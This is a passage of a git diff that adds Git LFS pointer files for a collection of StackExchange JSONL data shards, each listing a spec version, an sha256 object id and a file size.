sha256:ebf829ac3181b01cd000ac29b263092de273c9bb20025a1166c38b1acdfcc1fa +size 40954191 diff --git a/data/stackexchange/1-1/1792_2289.jsonl b/data/stackexchange/1-1/1792_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae108245d643a684b833ee761c08f45b0f32f564 --- /dev/null +++ b/data/stackexchange/1-1/1792_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:40882da1385105163400f96b157b3a9d8fc0e08f986c1cd85e1ee8186845be9b +size 40594620 diff --git a/data/stackexchange/1-1/1793_2289.jsonl b/data/stackexchange/1-1/1793_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f2e1cb197aab87085b8b452ee53a5daa13dcfc40 --- /dev/null +++ b/data/stackexchange/1-1/1793_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a999af3183e9f34251ed0d3cd7d50bf9796cd9d8327a28837aa85a5bc9a2ce2a +size 41237094 diff --git a/data/stackexchange/1-1/1794_2289.jsonl b/data/stackexchange/1-1/1794_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8bc0e6e67332c49e72c57562e4340f050cb6afe3 --- /dev/null +++ b/data/stackexchange/1-1/1794_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f87a90ae2a0b628ca28e25d6cd18c032cfbfd47329792a43e71611d66d9d4d71 +size 41220284 diff --git a/data/stackexchange/1-1/1795_2289.jsonl b/data/stackexchange/1-1/1795_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..03816e60dcc61fe81d9e76ab346a0c58322b4055 --- /dev/null +++ b/data/stackexchange/1-1/1795_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:12148d94176532332fab11920a1f2792f794090d31769520d7ff10fe783c5e49 +size 41345914 diff --git a/data/stackexchange/1-1/1796_2289.jsonl b/data/stackexchange/1-1/1796_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eb2896a6a23dca3bb20b73a430bc0e925b8d29e2 --- /dev/null +++ b/data/stackexchange/1-1/1796_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ed11c176fed424e337bb10b3c3a07ecc2b08b51d55629c3f841dc1e2a5d5ce80 +size 39804550 diff --git a/data/stackexchange/1-1/1797_2289.jsonl b/data/stackexchange/1-1/1797_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8dbb8485c14123fc5fb735b2ba753ef16478a810 --- /dev/null +++ b/data/stackexchange/1-1/1797_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2c70a677fead0936876812bdc112a8d9dde7670db44e08a8a5da67c7417c4cab +size 40619237 diff --git a/data/stackexchange/1-1/1798_2289.jsonl b/data/stackexchange/1-1/1798_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..452a03c6965afa2c2ae491122ee2217042b93a6a --- /dev/null +++ b/data/stackexchange/1-1/1798_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a98101fb52f8022c3e04927b4c71e2fe4e2ff2eb74936bee6fc8a614abc25f8 +size 40734761 diff --git a/data/stackexchange/1-1/1799_2289.jsonl b/data/stackexchange/1-1/1799_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ee20bae957b717e7945d7e70f5c4806241b7465a --- /dev/null +++ b/data/stackexchange/1-1/1799_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c43e23556b00ae4f1dc1cfc0a653df74b34821050e6b64c44ce9ca975192b667 +size 40728621 diff --git a/data/stackexchange/1-1/179_2289.jsonl b/data/stackexchange/1-1/179_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..88d68b163865ce6e20a16d56f4eaab234c2f7ac5 --- /dev/null +++ b/data/stackexchange/1-1/179_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c6b6db3e87532348f2d74800441815f72cf4e2253b3fb48f07efc3578c5c686f +size 35189934 diff --git a/data/stackexchange/1-1/17_2289.jsonl b/data/stackexchange/1-1/17_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1c02465c11f93da3b3c8beb65252e0c9b7ecff81 --- /dev/null +++ b/data/stackexchange/1-1/17_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a19e8c0e00e42f006f5b41805e1aa9c4df929174b3443d437e5b2591eec5dd55 +size 36021243 diff --git a/data/stackexchange/1-1/1800_2289.jsonl b/data/stackexchange/1-1/1800_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..47cecadb15d66040ee1c92021343ca220395e6ff --- /dev/null +++ b/data/stackexchange/1-1/1800_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7726fdd14147e9a9646b1f5e1d34f13fbfed0268b8b576f170753b9f1b5ce592 +size 40452204 diff --git a/data/stackexchange/1-1/1801_2289.jsonl b/data/stackexchange/1-1/1801_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6e8025f8d7d32fd372704b44cf2f2a54cce1fce0 --- /dev/null +++ b/data/stackexchange/1-1/1801_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:817f223b984fb2320ef11b57325a304887a4b3b4574d942a259f86b90d722895 +size 41168285 diff --git a/data/stackexchange/1-1/1802_2289.jsonl b/data/stackexchange/1-1/1802_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4c2b66cb2be2eca2a4608ea5b6c647f6e8da20cb --- /dev/null +++ b/data/stackexchange/1-1/1802_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f37cdee88aae08d703f1e51b49fa2675ef566bc544d5d2f4d6f259aadee20b83 +size 40897372 diff --git a/data/stackexchange/1-1/1803_2289.jsonl b/data/stackexchange/1-1/1803_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..16f6776ce56a3e2326b38c491687c4f2e60afc9c --- /dev/null +++ b/data/stackexchange/1-1/1803_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:078c5d2ce18011b5dc7ec1fd1568b6bfd7f9e9ed9d21a382fa7bfbf6aa7999e8 +size 40739653 diff --git a/data/stackexchange/1-1/1804_2289.jsonl b/data/stackexchange/1-1/1804_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7a55e52b64d3f74382c86fb63d45ca4ec42ca8ae --- /dev/null +++ b/data/stackexchange/1-1/1804_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ceafdaedbbe38b4a55053497afc4aac9773140c2ba7f20d99f9b76337aea82d +size 40086027 diff --git a/data/stackexchange/1-1/1805_2289.jsonl b/data/stackexchange/1-1/1805_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6b1a7750f94bc1018f3845dd115f5d49ca6b619c --- /dev/null +++ b/data/stackexchange/1-1/1805_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:521cc39034d18da57b58fae59af1e410448dcbf8c1bb3016d6a188d11ea05725 +size 41013870 diff --git a/data/stackexchange/1-1/1806_2289.jsonl b/data/stackexchange/1-1/1806_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..99cf975b4fe3dd4757561a8fe5ba697cbafcd33e --- /dev/null +++ b/data/stackexchange/1-1/1806_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2da5e9faf49bd786c225f34792088fcdc1b1dbce64594b667795c4245fc23e58 +size 40606071 diff --git a/data/stackexchange/1-1/1807_2289.jsonl b/data/stackexchange/1-1/1807_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4e1e6b7c35347685afa12a1defdb8344823a67b5 --- /dev/null +++ b/data/stackexchange/1-1/1807_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f3d31b88b59c81e4594346d58bf63cbde6191d07c62dcd2e5ba9928a8ed5d62c +size 40570352 diff --git a/data/stackexchange/1-1/1808_2289.jsonl b/data/stackexchange/1-1/1808_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..35461951b19672f3862c1683f5b435d077ed82ec --- /dev/null +++ b/data/stackexchange/1-1/1808_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67b5152c27785c7495315ab866efd82e934f5d31c24e6c9eefa26fde733427e4 +size 40990631 diff --git a/data/stackexchange/1-1/1809_2289.jsonl b/data/stackexchange/1-1/1809_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..758bc4163c9caf0557d62511852eac3fa1889362 --- /dev/null +++ b/data/stackexchange/1-1/1809_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9e785b46c5a91e40999d42929d3b647e06cd5e0cca05825b9aea6ea517fa6ac0 +size 40917611 diff --git a/data/stackexchange/1-1/180_2289.jsonl b/data/stackexchange/1-1/180_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..71ec0ec8c94528326e7bb4a37da724a50cd1db4a --- /dev/null +++ b/data/stackexchange/1-1/180_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ef4ce1483272592624f416b6257ae65a5a266e71525a158c4e3577928e55ea56 +size 35277780 diff --git a/data/stackexchange/1-1/1810_2289.jsonl b/data/stackexchange/1-1/1810_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18c2a93cea34edf7669e8a242cc6d83efd0558ce --- /dev/null +++ b/data/stackexchange/1-1/1810_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72408cc29792d599d571428e0c6ae64a8a0969833254841571e1605c0b366dcd +size 41063247 diff --git a/data/stackexchange/1-1/1811_2289.jsonl b/data/stackexchange/1-1/1811_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..925c7d31cb0278d66b26ceaba2745c0e9569f346 --- /dev/null +++ b/data/stackexchange/1-1/1811_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:11d9d9b9bbf88022a6b5f3257126615e2a26b0b506b59dde6ae57d5a8bac27dc +size 40698751 diff --git a/data/stackexchange/1-1/1812_2289.jsonl b/data/stackexchange/1-1/1812_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..54e8aca3ead878aba5699b8d45b8e835e9de52ee --- /dev/null +++ b/data/stackexchange/1-1/1812_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0b841e839dc3ee452baf261e1bfd52c4e6f1f20f3ab4bba78b2012f0cd2d09ad +size 41050107 diff --git a/data/stackexchange/1-1/1813_2289.jsonl b/data/stackexchange/1-1/1813_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bcc17d300aa1ca2f3253bf9c86d2029635f778a0 --- /dev/null +++ b/data/stackexchange/1-1/1813_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:985cf71011eebcebe56b239cd2728ee6372b43d091c47c68652edf11bc1f8a5d +size 42135096 diff --git a/data/stackexchange/1-1/1814_2289.jsonl b/data/stackexchange/1-1/1814_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cf3f003df1e41a6ef7d5e23eecbca0ebf80645ac --- /dev/null +++ b/data/stackexchange/1-1/1814_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4a0e6ffdb871adbef66fd81a9cdc2fb2d0b3b0bd49a0a5b010e69ac6f1cf8e35 +size 40141135 diff --git a/data/stackexchange/1-1/1815_2289.jsonl b/data/stackexchange/1-1/1815_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e4e5071391903e5152331fc026cdc1c2239fd021 --- /dev/null +++ b/data/stackexchange/1-1/1815_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:209aed7976f563e910185b1c25281f4c8e40d24bbbf33d7958cf796861aa7b90 +size 40710064 diff --git a/data/stackexchange/1-1/1816_2289.jsonl b/data/stackexchange/1-1/1816_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e0774af56f4dba8db56260ca0f71a65a2d6a278a --- /dev/null +++ b/data/stackexchange/1-1/1816_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:969c117fe6220ce9f3bd69e9402214d6e35455abd61660388f85fc89fa62bbfa +size 42030601 diff --git a/data/stackexchange/1-1/1817_2289.jsonl b/data/stackexchange/1-1/1817_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a627634677ac0bed85395dc3b3c64cbfbcc92b88 --- /dev/null +++ b/data/stackexchange/1-1/1817_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0b645027ea5cb65210de0e49b6c565315a3213f59470f9c019afa7ff03ee43d2 +size 40039267 diff --git a/data/stackexchange/1-1/1818_2289.jsonl b/data/stackexchange/1-1/1818_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5be8704b902d345b8ed3f39f073b4065a3aa474c --- /dev/null +++ b/data/stackexchange/1-1/1818_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b04c33e749fa0d3a79959c875def0f6ab087b5d3bfb3c9b8aabee92c6f011dfd +size 41313440 diff --git a/data/stackexchange/1-1/1819_2289.jsonl b/data/stackexchange/1-1/1819_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7265dd942d8ddd8eca80ed1f6df095faa3a3f162 --- /dev/null +++ b/data/stackexchange/1-1/1819_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:147eacb63ad2248df5c9cc636f71573b6e02c348b029b5411aa4d80e0b9f2ff6 +size 40291063 diff --git a/data/stackexchange/1-1/181_2289.jsonl b/data/stackexchange/1-1/181_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8f9c88eda111c8ab9a22c9142e459b84f7d1473f --- /dev/null +++ b/data/stackexchange/1-1/181_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a17cbb1dcf31c203340bac2c62ecc3ba5264a1f435298fe546551f41f0d7d49b +size 35173909 diff --git a/data/stackexchange/1-1/1820_2289.jsonl b/data/stackexchange/1-1/1820_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..97965a1a5097ef90e900236441742cbe188390a1 --- /dev/null +++ b/data/stackexchange/1-1/1820_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73eb441ba08fb778eb566ecac11769c1aaaa32de02f5a4b2496cdb357cfb960d +size 40960798 diff --git a/data/stackexchange/1-1/1821_2289.jsonl b/data/stackexchange/1-1/1821_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..709ae7b7691352812a02835d437270e15d084773 --- /dev/null +++ b/data/stackexchange/1-1/1821_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a96f6edc9493fe25b4cd839dcc492d15e84efb59cc8eb0544d967d19c5ee7424 +size 41194534 diff --git a/data/stackexchange/1-1/1822_2289.jsonl b/data/stackexchange/1-1/1822_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bae4b57513499993af2a74cbfe62e1f09ac02752 --- /dev/null +++ b/data/stackexchange/1-1/1822_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:febf3aaadd871a8a7da0f69f89132a4be879775d93311fe6df49d0eea11ef97e +size 40737611 diff --git a/data/stackexchange/1-1/1823_2289.jsonl b/data/stackexchange/1-1/1823_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e8afdf0183487fbd1e0bbaf8a4b5ee6f4ef67b53 --- /dev/null +++ b/data/stackexchange/1-1/1823_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c7494bda6ef3ebcf32c59332985ad68e3b939305b5a0be423118b1ed5e92421e +size 41542332 diff --git a/data/stackexchange/1-1/1824_2289.jsonl b/data/stackexchange/1-1/1824_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dc4ac65d3c5d7bea0313fa951ee054078fbe5a0b --- /dev/null +++ b/data/stackexchange/1-1/1824_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ea7e985c203f74dc034ddb4c72a9ce3bf44dec2f7d8f396cefcd96300d2aefe6 +size 41668839 diff --git a/data/stackexchange/1-1/1825_2289.jsonl b/data/stackexchange/1-1/1825_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3e4512455ea9981c5998338327ba450800781af2 --- /dev/null +++ b/data/stackexchange/1-1/1825_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:149856a9e317d2313cb0e0761753c40a281a11b6d594849c31521b19e06a29cf +size 40296430 diff --git a/data/stackexchange/1-1/1826_2289.jsonl b/data/stackexchange/1-1/1826_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0ce119cfa24b6d28c57d4a726cef01f00264210b --- /dev/null +++ b/data/stackexchange/1-1/1826_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:29cb9c6884612e32472473ed56b33e9427a393bdcf317fea75aa85ce731380c9 +size 40946483 diff --git a/data/stackexchange/1-1/1827_2289.jsonl b/data/stackexchange/1-1/1827_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fc7ac4dbb5e41bc26d5b0e80727a7df2bc5969a1 --- /dev/null +++ b/data/stackexchange/1-1/1827_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:95e06097b83104ce24300c047d33e1547d723323ed7866f0140c65357a6274c3 +size 41605106 diff --git a/data/stackexchange/1-1/1828_2289.jsonl b/data/stackexchange/1-1/1828_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8735ecdfcc3a044703cf2c90472c6c5a00d851b1 --- /dev/null +++ b/data/stackexchange/1-1/1828_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6e3493eadcbfde2ecf8ff9cdd15a1eb6e2b424c2cd63a89c8b9700509d505fbc +size 41261954 diff --git a/data/stackexchange/1-1/1829_2289.jsonl b/data/stackexchange/1-1/1829_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83f23ed7d45dfa4a39ce34d396d7e576efb81dbc --- /dev/null +++ b/data/stackexchange/1-1/1829_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:50f246a80744e3d640f5843e0ee03d69eff97e994e97118ce5dac8846c54e299 +size 41320747 diff --git a/data/stackexchange/1-1/182_2289.jsonl b/data/stackexchange/1-1/182_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..58d6873c149bab497d22802c2bcc325e12e2422b --- /dev/null +++ b/data/stackexchange/1-1/182_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:afd279e53652a14ca3013e5f2528971315366fc922e01a037adc02085fb5676a +size 34967450 diff --git a/data/stackexchange/1-1/1830_2289.jsonl b/data/stackexchange/1-1/1830_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..35119acc4dd74eb066e90efd847a12b99f026a32 --- /dev/null +++ b/data/stackexchange/1-1/1830_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a691e3d1bffe16abc64cf678e2fedd6b6ce33f558bd84d8b48061a09e8fef0e +size 41087304 diff --git a/data/stackexchange/1-1/1831_2289.jsonl b/data/stackexchange/1-1/1831_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..470fd5a39c3c3dd3c2f9937261057d3075370ae6 --- /dev/null +++ b/data/stackexchange/1-1/1831_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ae4675f008a96acc923a5e98efefaf436be5939347409f0ac70f8a959443f762 +size 40798153 diff --git a/data/stackexchange/1-1/1832_2289.jsonl b/data/stackexchange/1-1/1832_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..be4c354e534e01c590ba429ed503b9343403b512 --- /dev/null +++ b/data/stackexchange/1-1/1832_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:721e48eb04ce75c0d2a00d34d9ae86cfada43bc5ced2b14bbc4e07a1f8b4b5df +size 40628120 diff --git a/data/stackexchange/1-1/1833_2289.jsonl b/data/stackexchange/1-1/1833_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18629e2888863bf3f3be664876e07c76a4bc5349 --- /dev/null +++ b/data/stackexchange/1-1/1833_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cbb7de1fef83de5e5dd71096eca954a6359fc8e653dc2615f1c5a47b0603f9c5 +size 40813625 diff --git a/data/stackexchange/1-1/1834_2289.jsonl b/data/stackexchange/1-1/1834_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b6f8d33b3508d0277942d92b554f624df813293a --- /dev/null +++ b/data/stackexchange/1-1/1834_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:be50d54777bb435490344c4cca6b67c9976811e7c15dcac2e43ba38021ba1547 +size 41036558 diff --git a/data/stackexchange/1-1/1835_2289.jsonl b/data/stackexchange/1-1/1835_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..393b86daad66142f4b758a2404f2dc8ab1d765c3 --- /dev/null +++ b/data/stackexchange/1-1/1835_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e0ccdf0c7413b93cc2970f7e971b6b2b8f92a7374014acb2e65237fd2f58c310 +size 41213705 diff --git a/data/stackexchange/1-1/1836_2289.jsonl b/data/stackexchange/1-1/1836_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e0aee9fdcfdee39c45c06b94b63f74e00e46c012 --- /dev/null +++ b/data/stackexchange/1-1/1836_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:786040fdf86877ae08d546589c0e1dad1b45e5a48caaf3556897c05e61e1962c +size 41912954 diff --git a/data/stackexchange/1-1/1837_2289.jsonl b/data/stackexchange/1-1/1837_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d946b91466c2a403048861325dd6e87c5ffea1b3 --- /dev/null +++ b/data/stackexchange/1-1/1837_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:144ac42493662d9bf90e105490da179e5edb160f4461c5043dda1dd0815e3c81 +size 40300295 diff --git a/data/stackexchange/1-1/1838_2289.jsonl b/data/stackexchange/1-1/1838_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f038172ba8c532de97dd5c4e58e0da54753f1e3 --- /dev/null +++ b/data/stackexchange/1-1/1838_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:66b5c560cfe4bc1fe73352af2cab8ae30148037eef9d5b167c3d8740a127f58a +size 40750815 diff --git a/data/stackexchange/1-1/1839_2289.jsonl b/data/stackexchange/1-1/1839_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c9d01d635f950f02fa68f0ffe2d5980196a19a28 --- /dev/null +++ b/data/stackexchange/1-1/1839_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a17f3dcdade9a12955c4cb9ab3098e4a465dc6803ac13afe52fa8f85ad49963b +size 34621254 diff --git a/data/stackexchange/1-1/183_2289.jsonl b/data/stackexchange/1-1/183_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..91073bee251d4718bd65b033be86627fb1ed7f91 --- /dev/null +++ b/data/stackexchange/1-1/183_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f974420bbd8db16cd8f8f34850751264fe04a43e98ae0db910d3a63cc2369bdb +size 34790882 diff --git a/data/stackexchange/1-1/1840_2289.jsonl b/data/stackexchange/1-1/1840_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..97819ada268058c76069621bd5dbb360e1cb9783 --- /dev/null +++ b/data/stackexchange/1-1/1840_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cabe717cb0e25aa3d162215071f17da9baad307fb3e5df5276293f49d7864896 +size 34722357 diff --git a/data/stackexchange/1-1/1841_2289.jsonl b/data/stackexchange/1-1/1841_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca6affd95152fd0284ab2943ccfae23d77abeef5 --- /dev/null +++ b/data/stackexchange/1-1/1841_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:368e748c16c7eb1ad3e925c3c9adc24b88a44d15aa385f2e0c030e50f74c0b68 +size 34369500 diff --git a/data/stackexchange/1-1/1842_2289.jsonl b/data/stackexchange/1-1/1842_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3911a9adf5919c3125b1c2b28bc442bcbf1e979 --- /dev/null +++ b/data/stackexchange/1-1/1842_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9f27b8164fd0d428c8d049cbe5047bd5fd41ae3d5b2336f7cfb13a722bc92ba +size 34123655 diff --git a/data/stackexchange/1-1/1843_2289.jsonl b/data/stackexchange/1-1/1843_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b9ae025f0c64303b38a028363c65e157e4f90f1c --- /dev/null +++ b/data/stackexchange/1-1/1843_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:85ca8d876d100331e2fd7fba458f66e291a76c07cd8b1f4cfe6fd33622d03b43 +size 35344681 diff --git a/data/stackexchange/1-1/1844_2289.jsonl b/data/stackexchange/1-1/1844_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..054357c81eaacab913f8a43e9c000c9bed6db7a3 --- /dev/null +++ b/data/stackexchange/1-1/1844_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0617eb1a580d501969d1cbfa272da10e3a507a46aedb23b6b0ec329d56d7386f +size 33881489 diff --git a/data/stackexchange/1-1/1845_2289.jsonl b/data/stackexchange/1-1/1845_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f1d2bbe302716487c5c03ccdd898222d45d5ac7 --- /dev/null +++ b/data/stackexchange/1-1/1845_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:10009fc285a461ba626357864f47c2d8e31e1e2f8978daf239049c035606a578 +size 34367579 diff --git a/data/stackexchange/1-1/1846_2289.jsonl b/data/stackexchange/1-1/1846_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fe8c90ff1c9d9b6e01edf683f40f5a7f972776f7 --- /dev/null +++ b/data/stackexchange/1-1/1846_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9bace7ed208277e8262838dbfcb0dd279441d0c837b929d147a7090ce12c337 +size 34359674 diff --git a/data/stackexchange/1-1/1847_2289.jsonl b/data/stackexchange/1-1/1847_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..865c4940b13f1c3c39ce66182daca7b197d87a78 --- /dev/null +++ b/data/stackexchange/1-1/1847_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b290e97db66beea9c37b3fbb3054535e0090b6227325480bab860cb6078a27da +size 34578436 diff --git a/data/stackexchange/1-1/1848_2289.jsonl b/data/stackexchange/1-1/1848_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..46bdb5d17a3afe9e03569961a835617b8ece03f1 --- /dev/null +++ b/data/stackexchange/1-1/1848_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7ed8006c5511a27df0c7c38c4989825b9fc606fa05e4a14ea45e5227759995c5 +size 34009962 diff --git a/data/stackexchange/1-1/1849_2289.jsonl b/data/stackexchange/1-1/1849_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..009c061ff030d3c895eaca34ce61528b1cb443c0 --- /dev/null +++ b/data/stackexchange/1-1/1849_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3efac11176b0276dc24826543007c3575df3a062a68f1160be08a1e5b22ce5e9 +size 34826432 diff --git a/data/stackexchange/1-1/184_2289.jsonl b/data/stackexchange/1-1/184_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9dde663d9c914a7a053dcb89675bcda01acefa92 --- /dev/null +++ b/data/stackexchange/1-1/184_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 